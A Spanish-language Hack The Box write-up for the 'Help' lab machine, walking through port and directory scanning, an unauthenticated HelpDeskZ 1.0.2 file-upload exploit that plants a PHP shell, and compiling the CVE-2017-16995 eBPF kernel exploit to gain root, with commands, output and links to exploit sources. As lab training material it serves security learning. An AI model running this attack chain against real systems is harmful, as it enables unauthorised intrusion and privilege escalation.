Entrada

Help

Publicado
Hack The Box
Hack The Box
Por Pablo Martínez Rivas
3 min de lectura
Help

Help Linux · Easy - Adventure mode

🔭 Reconocimiento:

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19

└─$ nmap -p- -sSVC --min-rate 5000 10.129.230.159
Starting Nmap 7.98 ( https://nmap.org ) at 2026-02-12 11:45 +0100
Nmap scan report for 10.129.230.159
Host is up (0.046s latency).
Not shown: 65532 closed tcp ports (reset)
PORT     STATE SERVICE VERSION
22/tcp   open  ssh     OpenSSH 7.2p2 Ubuntu 4ubuntu2.6 (Ubuntu Linux; protocol 2.0)
| ssh-hostkey:
|   2048 e5:bb:4d:9c:de:af:6b:bf:ba:8c:22:7a:d8:d7:43:28 (RSA)
|   256 d5:b0:10:50:74:86:a3:9f:c5:53:6f:3b:4a:24:61:19 (ECDSA)
|_  256 e2:1b:88:d3:76:21:d4:1e:38:15:4a:81:11:b7:99:07 (ED25519)
80/tcp   open  http    Apache httpd 2.4.18
|_http-server-header: Apache/2.4.18 (Ubuntu)
|_http-title: Did not follow redirect to http://help.htb/
3000/tcp open  http    Node.js Express framework
|_http-title: Site doesn't have a title (application/json; charset=utf-8).
Service Info: Host: 127.0.1.1; OS: Linux; CPE: cpe:/o:linux:linux_kernel
Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 37.17 seconds

help_graphql

Parece que hay otro camino donde explotar, esta máquina, pero en este caso no seguí este camino.

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34

┌──(pmartinezr㉿kali)-[~]
└─$ dirsearch -u http://help.htb
/usr/lib/python3/dist-packages/dirsearch/dirsearch.py:23: DeprecationWarning: pkg_resources is deprecated as an API. See https://setuptools.pypa.io/en/latest/pkg_resources.html
from pkg_resources import DistributionNotFound, VersionConflict
_|. _ _  _  _  _ _|_    v0.4.3
(_||| _) (/_(_|| (_| )
Extensions: php, aspx, jsp, html, js | HTTP method: GET | Threads: 25 | Wordlist size: 11460
Output File: /home/pmartinezr/reports/http_help.htb/_26-02-12_11-59-26.txt
Target: http://help.htb/
[11:59:26] Starting:
[11:59:32] 403 -  294B  - /.ht_wsr.txt
[11:59:32] 403 -  299B  - /.htaccess.sample
[11:59:32] 403 -  297B  - /.htaccess.bak1
[11:59:32] 403 -  298B  - /.htaccess_extra
[11:59:32] 403 -  295B  - /.htaccess_sc
[11:59:32] 403 -  297B  - /.htaccess_orig
[11:59:32] 403 -  295B  - /.htaccessOLD
[11:59:32] 403 -  295B  - /.htaccessBAK
[11:59:32] 403 -  297B  - /.htaccess.save
[11:59:32] 403 -  296B  - /.htaccessOLD2
[11:59:32] 403 -  297B  - /.htaccess.orig
[11:59:32] 403 -  287B  - /.htm
[11:59:32] 403 -  288B  - /.html
[11:59:32] 403 -  297B  - /.htpasswd_test
[11:59:32] 403 -  293B  - /.htpasswds
[11:59:32] 403 -  294B  - /.httr-oauth
[11:59:34] 403 -  288B  - /.php3
[11:59:34] 403 -  287B  - /.php
[12:00:23] 301 -  309B  - /javascript  ->  http://help.htb/javascript/
[12:00:55] 403 -  296B  - /server-status
[12:00:55] 403 -  297B  - /server-status/
[12:01:01] 301 -  306B  - /support  ->  http://help.htb/support/
[12:01:01] 200 -    1KB - /support/
Task Completed

Descubro una web de http://help.htb/support/

help_support

💣 Preparación:

https://github.com/JubJubMcGrub/HelpDeskZ-1.0.2-File-Uplaod

Encontré el siguiente exploit y decidí forkearlo porque estaba escrito en Python2, por lo que decidí adaptarlo porque me pareció que el código tenía calidad por ser simple y claro.

https://github.com/pmartinezrhub/HelpDeskZ-1.0.2-File-Upload

🪲 Explotación:

La explicación completa del exploit https://www.exploit-db.com/exploits/40300

👽 Acciones:

1
2
3
4
5

┌──(exploits)(pmartinezr㉿kali)-[~/htb/help/exploits]
└─$ python helpdeskz.py http://help.htb/support/uploads/tickets/  rev.php
HelpDesk v1.0.2 - Unauthenticated shell upload
found!
http://help.htb/support/uploads/tickets/08b19dc5fc119d365afdf14628bceda9.php

1
2
3

help@help:/home/help$
/home/help$ cat user.txt
263ce46a5ef72b70************

Primera flag

1
2
3
4
5
6

[+] [CVE-2017-16995] eBPF_verifier
Details: https://ricklarabee.blogspot.com/2018/07/ebpf-and-analysis-of-get-rekt-linux.html
Exposure: highly probable
Tags: debian=9.0{kernel:4.9.0-3-amd64},fedora=25|26|27,ubuntu=14.04{kernel:4.4.0-89-generic},[ ubuntu=(16.04|17.04) ]{kernel:4.(8|10).0-(19|28|45)-generic}
Download URL: https://www.exploit-db.com/download/45010
Comments: CONFIG_BPF_SYSCALL needs to be set && kernel.unprivileged_bpf_disabled != 1

Subí Linpeas.sh y este nos sugiere un exploit de Kernel

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20

help@help:/home/help$ gcc -o exp 45010.c
help@help:/home/help$ ./exp
[.]
[.] t(-_-t) exploit for counterfeit grsec kernels such as KSPP and linux-hardened t(-_-t)
[.]
[.]   ** This vulnerability cannot be exploited at all on authentic grsecurity kernel **
[.]
[*] creating bpf map
[*] sneaking evil bpf past the verifier
[*] creating socketpair()
[*] attaching bpf backdoor to socket
[*] skbuff => ffff88003686d200
[*] Leaking sock struct from ffff88003c65f400
[*] Sock->sk_rcvtimeo at offset 472
[*] Cred structure at ffff88003b69c840
[*] UID from cred structure: 1000, matches the current: 1000
[*] hammering cred structure at ffff88003b69c840
[*] credentials patched, launching shell...
# whoami
root

Debemos compilar el exploit en la propia máquina porque esto es cosa antigua.

achivement

writeup, hackthebox
hackthebox help
Esta entrada está licenciada bajo CC BY 4.0 por el autor.